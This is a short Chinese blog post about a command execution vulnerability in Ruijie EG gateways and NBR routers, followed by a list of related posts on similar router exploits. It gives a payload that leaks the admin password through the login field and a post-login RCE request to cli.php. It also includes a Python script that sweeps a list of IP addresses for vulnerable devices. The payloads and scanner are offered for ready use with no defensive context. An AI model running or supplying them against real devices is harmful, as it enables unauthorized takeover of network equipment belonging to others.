锐捷EG易网关与NBR路由器命令执行漏洞-2
文章目录
- 1、获取密码
- 2、登陆后台RCE
- 3、poc脚本
前言:关于锐捷EG易网关与NBR路由器的命令执行漏洞
1、获取密码
poc:
username=admin&password=pass?show webmaster user
2、登陆后台RCE
前提:成功登陆后台
poc:
POST /cli.php?a=shellnotdelay=true&command=whoami
3、poc脚本
随便写了个,比较简单,可以修改
1.txt内容格式就是ip就行,一行一个IP
格式如下:
1.1.1.1
2.2.2.2
3.3.3.3
代码如下
import requests
import logginglogging.captureWarnings(True) #忽略警告
fopen=open("1.txt",'r')
lines=fopen.readlines()#print(lines)for ip in lines:ip=ip.strip()#print("正在测试"+ip)try:#data = "username=admin&password=admin?show webmaster user"data={'username': 'admin','password':'pass?show webmaster use'}r = requests.post("https://"+ip+":4430/login.php", verify=False,timeout=1,data=data)#print(r.status_code)#print("https://"+ip+":4430/login.php")#print(r.text)if "data" in r.text:print("#################"+ip+"存在锐捷EG易网关命令执行#################")else:print(ip+"不存在锐捷EG易网关命令执行")except:pass
还有遇到的一个锐捷远程代码执行漏洞,点击传送门
锐捷EG易网关与NBR路由器命令执行漏洞-2相关推荐
- 锐捷NBR路由器命令执行漏洞复现
锐捷NBR路由器命令执行漏洞 首先先看看页面的样子 2. 这里需要注意的是,由于权限问题,厂商使用的cookie为用户名密码加密使用,什么意思呢? 经过测试,当密码输入错误的时候,部分型号nbr路由器 ...
- 锐捷EG易网关远程命令执行漏洞-1
文章目录 测试poc payload1-命令执行结果写入文件 payload2-访问写入的文件 简单脚本 这里是在EG易网关中测试出来的,不知NBR路由器是否存在 测试poc /guest_auth/ ...
- NETGEAR 系列路由器命令执行漏洞简析
NETGEAR 系列路由器命令执行漏洞简析 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR R7000路由器的命令注入漏洞.一时间,各路人马开始忙碌起来.厂商忙于声明和 ...
- 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell 漏洞编号: CNVD-2021-09650 漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执 ...
- 锐捷NBR路由器远程命令执行漏洞(CNVD-2021-09650)
漏洞描述 锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限. 漏洞复现 访问锐捷EWEB网管系统界面 使用HackBar执行payload POS ...
- 转型 细分 新篇章——2018锐捷睿易全国合作伙伴大会
1月21日,星城长沙,近500家合作伙伴,600余人齐聚2018锐捷睿易全国合作伙伴大会,与会合作伙伴和参会人数均创历史新高,规模空前. 大会用丰富充实的业绩报告.经验分享.新品体验等带领大家回顾了成 ...
- 锐捷睿易RAP100全新上市 WALL AP也有超高性能
一好友去丽江旅游,打电话抱怨说,终于明白为什么丽江是个充满"艳遇"的地方,因为酒店,KTV,饭店,咖啡厅的无线网络都极差,看不了电脑,玩不了手机-- 的确,无线网络覆盖已经成为人们 ...
- 漏洞情报 | 锐捷RSR路由器设备存在命令执行漏洞
点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 2021年4月14日,360漏洞云监测到锐捷网络官方通告了锐捷网络RSR路由器系列产品的Web管理存在命令执行漏洞(CNVD-2021 ...
- 锐捷 Smartweb管理系统 命令执行漏洞
锐捷 Smartweb管理系统 0x01 漏洞描述 0x02 漏洞指纹 0x03 漏洞复现 0x01 漏洞描述 锐捷网络是一家拥有包括交换机.路由器.软件.安全防火墙.无线产品.存储等全系列的网络设备 ...
- 华为路由器远程命令执行漏洞复现(CVE-2017-17215)
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...
最新文章
- 操作document对象练习
- 设计师学习HTML/CSS之路-13
- 飞鸽传书10048错误的解决
- HDU3790 最短路径问题【Dijkstra算法】
- flink读取不到文件_flink批处理从0到1
- Codeforces Round #555 (Div. 3) E. Minimum Array
- Git常用命令(持续更新)
- 机器学习之数据预处理——降噪
- js脚本锁计算机软件,AutoJs解密工具
- matlab找零钱,自动售货系统
- 一步步用python制作游戏外挂
- GPG使用方法总结(密钥管理,加解密文件)
- JavaScript实现打字机效果
- 日期时间在ios上显示错误
- linux awk比较大小,linux基础只是之awk命令使用,统计最大长度
- 核典型关联分析(KCCA)算法原理
- 关于U盘中毒,文件全变成快捷方式
- 计算机四屏故障维修,液晶显示器有哪些常见故障 液晶显示器常见故障及维修方法...
- JAVA RSA算法加密实现 eclipse
- facebook入华,你了解这些信息吗?